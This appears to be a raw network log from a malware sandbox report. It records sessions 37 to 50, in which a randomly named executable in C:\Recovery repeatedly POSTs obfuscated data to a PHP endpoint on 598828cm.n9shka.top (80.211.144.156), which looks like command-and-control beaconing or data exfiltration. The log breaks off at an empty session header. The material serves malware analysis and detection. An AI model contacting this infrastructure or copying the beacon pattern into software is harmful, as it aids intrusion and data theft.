Sep 14, 2024 12:53:43.359333038 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1724 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:43.712502003 CEST	1724	OUT	Data Raw: 53 57 5c 5b 54 48 5a 5b 5e 5e 56 51 56 5f 54 53 57 5f 5c 5f 57 5c 55 5e 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SW\[THZ[^^VQV_TSW_\_W\U^QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X(Z%['=-!8Z(>=5Y'$8\%:+9/Q19)^!0!X/,&F/%Z-9
Sep 14, 2024 12:53:44.051898956 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:44.187567949 CEST	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 00 1f 20 07 3e 1d 30 5f 22 3a 2b 09 2b 2f 36 5e 3d 31 25 01 2a 12 33 5a 28 34 22 03 2a 2e 30 0f 27 2c 2b 06 27 1f 26 00 27 34 30 0f 22 11 2e 5a 0c 1d 23 11 23 0d 0b 04 32 01 31 00 24 1f 3e 5c 23 22 11 16 25 2b 3d 5c 21 06 25 01 28 06 22 09 2a 31 22 0c 28 3e 2e 09 2c 04 2a 14 37 12 23 51 00 10 26 55 26 3e 3e 03 35 37 3d 56 2a 08 25 59 25 36 21 0f 27 15 26 5c 31 06 21 1b 24 0a 30 04 35 21 27 12 24 3c 2b 1a 20 30 22 0f 28 14 23 52 2b 0d 28 57 02 3e 5c 4d Data Ascii: >0_":++/6^=1%3Z(4".0',+'&'40".Z##21$>\#"%+=\!%("1"(>.,7#Q&U&>>57=V*%Y%6!'&\1!$05!'$<+ 0"(#R+(W>\M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	62803	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:43.492957115 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:43.837371111 CEST	1012	OUT	Data Raw: 53 53 59 5b 51 41 5a 5c 5e 5e 56 51 56 59 54 58 57 53 5c 59 57 5d 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SSY[QAZ\^^VQVYTXWS\YW]U]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+0.64 ]>=>"Y''8<\&<?)/Q&* ;&F/%Z-!
Sep 14, 2024 12:53:44.181045055 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:44.312381029 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	62804	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:44.447617054 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue
Sep 14, 2024 12:53:44.807044983 CEST	1012	OUT	Data Raw: 56 54 59 59 51 41 5a 5b 5e 5e 56 51 56 58 54 58 57 55 5c 59 57 58 55 56 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VTYYQAZ[^^VQVXTXWU\YWXUVQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%(<:&>"V644Z>5< 38(&\4+9#Q%^40"8<&F/%Z-%
Sep 14, 2024 12:53:45.131305933 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:45.264112949 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	62805	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:45.392992020 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:45.743783951 CEST	1012	OUT	Data Raw: 53 50 5c 58 51 43 5a 5c 5e 5e 56 51 56 52 54 53 57 57 5c 5f 57 59 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SP\XQCZ\^^VQVRTSWW\_WYU_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Z*?5_$=>5Q((>6"?#%(;%:'^(Q1%Y73).<&F/%Z-
Sep 14, 2024 12:53:46.057602882 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:46.188416958 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	62806	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:46.315531015 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:46.665599108 CEST	1012	OUT	Data Raw: 56 51 59 58 51 43 5f 59 5e 5e 56 51 56 5e 54 52 57 54 5c 5c 57 59 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VQYXQC_Y^^VQV^TRWT\\WYU]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+!X&.2W"$4\=-"[6, ]';+1+X)0'973Y;<&F/%Z-=
Sep 14, 2024 12:53:46.988356113 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:47.118244886 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	62807	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:47.263241053 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:47.618690014 CEST	1012	OUT	Data Raw: 56 54 5c 58 54 46 5a 5e 5e 5e 56 51 56 58 54 5c 57 5e 5c 5a 57 5d 55 56 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VT\XTFZ^^^VQVXT\W^\ZW]UVQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Y<<^'X9"$<Y[-#/'3,X%<(92%7),<&F/%Z-%
Sep 14, 2024 12:53:47.931679010 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:48.064486027 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	62808	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:48.194093943 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:48.543890953 CEST	1012	OUT	Data Raw: 53 52 5c 5f 51 42 5a 5b 5e 5e 56 51 56 5e 54 5e 57 51 5c 5b 57 5d 55 5b 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SR\_QBZ[^^VQV^T^WQ\[W]U[QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%?!Z3>>57>*!Y4'+%7+%5!3Y,<&F/%Z-=
Sep 14, 2024 12:53:48.885278940 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:49.077507973 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	62809	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:49.203115940 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1748 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:49.556320906 CEST	1748	OUT	Data Raw: 56 50 59 5e 54 43 5f 5b 5e 5e 56 51 56 5f 54 5f 57 57 5c 5a 57 59 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VPY^TC_[^^VQV_T_WW\ZWYUXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%[?/%[3==5#=.\"<X'#%9/(?R2%##![.<&F/%Z-9
Sep 14, 2024 12:53:49.895952940 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:50.200736046 CEST	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 00 1f 20 04 3e 1a 0a 5b 22 3a 0d 0c 2a 3f 22 59 3d 0b 29 05 3e 2c 28 07 3d 27 3e 03 2a 3e 37 57 30 05 2f 02 27 22 29 58 33 0e 2f 50 22 3b 2e 5a 0c 1d 20 01 21 33 2e 5b 25 3b 2e 13 27 57 36 59 23 0c 27 5c 32 38 31 5a 35 11 31 05 3c 16 26 09 3d 0f 29 1f 3d 04 3a 40 2e 3d 04 56 37 38 23 51 00 10 26 19 31 3e 32 04 35 37 39 53 3d 32 35 58 26 0b 2d 0f 30 38 35 05 31 06 36 01 27 0d 20 02 35 22 24 01 33 05 20 01 34 0d 04 0a 28 2e 23 52 2b 0d 28 57 02 3e 5c 4d Data Ascii: >[":?"Y=)>,(='>>7W0/'")X3/P";.Z !3.[%;.'W6Y#'\281Z51<&=)=:@.=V78#Q&1>2579S=25X&-08516' 5"$3 4(.#R+(W>\M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	62810	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:49.208008051 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:49.556190014 CEST	1012	OUT	Data Raw: 56 5f 5c 5c 51 46 5a 5d 5e 5e 56 51 56 53 54 58 57 51 5c 5b 57 5c 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: V_\\QFZ]^^VQVSTXWQ\[W\UXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X?<X&>6'<Y*-!/X3; X17+/Q1\) !]/,&F/%Z-
Sep 14, 2024 12:53:49.873395920 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:50.199666977 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP
Sep 14, 2024 12:53:50.214766026 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	62811	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:50.337892056 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue
Sep 14, 2024 12:53:50.696820974 CEST	1012	OUT	Data Raw: 56 5e 59 5f 54 49 5f 58 5e 5e 56 51 56 59 54 58 57 52 5c 5e 57 5a 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: V^Y_TI_X^^VQVYTXWR\^WZU_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&(Z"05#)[]!X$81#[+_ 2954!\,<&F/%Z-!
Sep 14, 2024 12:53:51.026640892 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:51.158409119 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	62812	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:51.284390926 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:51.634628057 CEST	1012	OUT	Data Raw: 56 52 59 5b 51 46 5a 58 5e 5e 56 51 56 53 54 5a 57 54 5c 5b 57 59 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VRY[QFZX^^VQVSTZWT\[WYU\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%<Z&0>2"#==*5?83;8X%),?9/%:9^#!8&F/%Z-
Sep 14, 2024 12:53:52.171122074 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:52.171145916 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP
Sep 14, 2024 12:53:52.171170950 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	62813	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:52.301625967 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:52.649991989 CEST	1012	OUT	Data Raw: 53 50 59 59 51 44 5f 5f 5e 5e 56 51 56 59 54 5f 57 5f 5c 54 57 5c 55 59 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SPYYQD__^^VQVYT_W_\TW\UYQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X(,&$X:57()!!Y ['+8%?^<3'9)_#3.<&F/%Z-!
Sep 14, 2024 12:53:52.967427015 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:53.096456051 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	62814	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:53.279352903 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:53.634370089 CEST	1012	OUT	Data Raw: 53 50 59 5d 51 43 5a 53 5e 5e 56 51 56 5a 54 5c 57 56 5c 5c 57 59 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SPY]QCZS^^VQVZT\WV\\WYU\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%+9^0&R!Q4X>=-"''+#%)#[+:4%"709/&F/%Z--
Sep 14, 2024 12:53:53.963699102 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:54.182795048 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP
Sep 14, 2024 12:53:54.182822943 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	62815	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:54.413625956 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:54.759351969 CEST	1012	OUT	Data Raw: 56 53 59 58 54 47 5f 5f 5e 5e 56 51 56 5f 54 5b 57 52 5c 58 57 5f 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VSYXTG__^^VQV_T[WR\XW_U]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%\(<-$"Q<>=1#?%84&\#*9/%:##,<&F/%Z-9
Sep 14, 2024 12:53:55.086540937 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:55.359038115 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP
Sep 14, 2024 12:53:55.359080076 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	62816	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
